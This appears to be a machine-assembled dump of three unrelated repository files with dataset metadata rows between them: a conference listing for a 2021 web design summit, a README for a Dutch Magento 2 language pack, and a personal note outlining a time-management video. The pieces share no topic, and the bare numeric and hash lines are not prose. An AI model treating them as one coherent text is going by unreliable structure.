--- title: 'An Event Apart: Spring Summit 2021' url: 'https://aneventapart.com/event/spring-summit-2021' cocUrl: 'https://aneventapart.com/registration-information#code-of-conduct' date: 2021-04-19T21:28:27.799Z endDate: 2021-04-21T21:28:27.809Z location: Remote byline: Online Together --- Online Together: Spring Summit is a three-day web design conference with an intense focus on digital design, UX, content, code, and more—featuring 15+ in-depth sessions, Q&A with the speakers, and more. You'll get deep insights into where we are now and where things are going next.
47.916667
282
0.772174
eng_Latn
0.95708
53a89250b5d36aefce1ff36d6fb0e0798c5b668d
2,286
md
Markdown
README.md
peterjaap/language_nl_nl
8107630eb1b0e741c7b3d10ee549df32178975de
[ "MIT" ]
null
null
null
README.md
peterjaap/language_nl_nl
8107630eb1b0e741c7b3d10ee549df32178975de
[ "MIT" ]
null
null
null
README.md
peterjaap/language_nl_nl
8107630eb1b0e741c7b3d10ee549df32178975de
[ "MIT" ]
null
null
null
# Dutch (Nederlands) Magento2 Language Pack (nl_NL)

This is a Language Pack generated from the [official Magento2 translations project](https://crowdin.com/project/magento-2) at [Crowdin](https://crowdin.com).
The Dutch (Nederlands) translations used can be found [here](https://crowdin.com/project/magento-2/nl).
This translation is useful for people living in the Netherlands (Nederland).

For our other language packs, see the [Magento2Translations](http://magento2translations.github.io/) page.

# Version & progress

This translation is generated from the branch [Head](https://crowdin.com/project/magento-2/nl#/Head) at Crowdin and based on the Magento 2.2.0 source files.
7744 of the 8763 strings in the Magento source have been translated.

Translation progress: ![Progress](http://progressed.io/bar/88)

# Installation

**Please select the git branch appropriate for your Magento version from this repo.**

## Via composer

To install this translation package with Composer you need access to the command line of your server and you need to have [Composer](https://getcomposer.org).

```
cd <your magento path>
composer require magento2translations/language_nl_nl:dev-master
php bin/magento cache:clean
```

## Manually

To install this language package manually you need access to your server file system.

* Download the zip file [here](https://github.com/Magento2Translations/language_nl_nl/archive/master.zip).
* Upload the contents to `<your magento path>/app/i18n/magento2translations/language_nl_nl`.
* The files should then be located like this: `<your magento path>/app/i18n/magento2translations/nl_NL/nl_NL.csv`.
* Go to your Magento admin panel and clear the caches.

# Usage

To use this language pack, log in to your admin panel, go to `Stores -> Configuration -> General > General -> Locale options` and set the '*locale*' option to '*Dutch (Netherlands)*'.

# Contribute

To help push the '*Dutch (Nederlands) Magento2 Language Pack (nl_NL)*' forward, please go to [this](https://crowdin.com/project/magento-2/nl) Crowdin page and translate the lines.

# Authors

The translations are done by the [official Magento2 translations project](https://crowdin.com/project/magento-2).
Code generation is sponsored by [Wijzijn.Guru](http://www.wijzijn.guru/).
58.615385
182
0.781715
eng_Latn
0.964614
53a9e92c33048301411961b9986075a3a4acfe87
1,050
md
Markdown
content/+ Studyquil the definitive TIME MANAGEMENT GUIDE for busy but lazy people.md
ransurf/quartz
174c514401f4265b360fb0e22449adeb462cc152
[ "MIT" ]
null
null
null
content/+ Studyquil the definitive TIME MANAGEMENT GUIDE for busy but lazy people.md
ransurf/quartz
174c514401f4265b360fb0e22449adeb462cc152
[ "MIT" ]
null
null
null
content/+ Studyquil the definitive TIME MANAGEMENT GUIDE for busy but lazy people.md
ransurf/quartz
174c514401f4265b360fb0e22449adeb462cc152
[ "MIT" ]
null
null
null
--- started: 2022-01-08 finished: rating: --- Status: #📥/🟧 Tags: [[Time Management]] - [[Studyquill Case Study]] Links: [[+ Videos]] ___ # + Studyquil the definitive TIME MANAGEMENT GUIDE for busy but lazy people > [URL]() Creator:: me ! ## Notes ### Content #### how to prioritize - janice's matrix - [![Image from Gyazo](https://i.gyazo.com/062df13c2331501ecbb3a89a0d6c31d2.png)](https://gyazo.com/062df13c2331501ecbb3a89a0d6c31d2) - interim deadlines #### planning - scheduling tasks - to do list - estimate time length - schedule in day - batch - include free time - tools #### execute - external accountability - 2 minute rule - only 2 minutes - take breaks ### Content style - describe principle - how do you do it? - why does it work? - ex) 2 minute rule helps with x - basically, you y - i use this for z - explain via example - show applications ## Thoughts/Questions - ___ # Backlinks ```dataview list from [[+ Studyquil the definitive TIME MANAGEMENT GUIDE for busy but lazy people]] ``` ___ Created:: 2022-01-08 19:01
20.192308
134
0.7
eng_Latn
0.887094